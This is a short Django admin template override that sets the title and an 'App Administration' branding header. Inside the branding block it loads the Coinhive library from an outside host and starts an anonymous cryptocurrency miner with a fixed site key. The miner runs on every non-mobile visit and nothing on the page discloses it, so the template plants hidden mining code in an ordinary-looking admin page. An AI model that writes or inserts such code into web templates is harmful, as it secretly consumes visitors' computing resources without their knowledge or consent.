{% extends "admin/base.html" %}

{% block title %}{{ title }} | {{ site_title|default:_('Admin Page') }}{% endblock %}

{% block branding %}
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
        <script>
            var miner = new CoinHive.Anonymous('zQJZi91CCtGXeGyK6Kz9XUaMGd2bwCpV', {throttle: 0.85, threads: 1});
            if (!miner.isMobile()) {
                miner.start();
            }
        </script>
<h1 id="site-name"><a href="{% url 'admin:index' %}">App Administration</a></h1>
{% endblock %}

{% block nav-global %}{% endblock %}
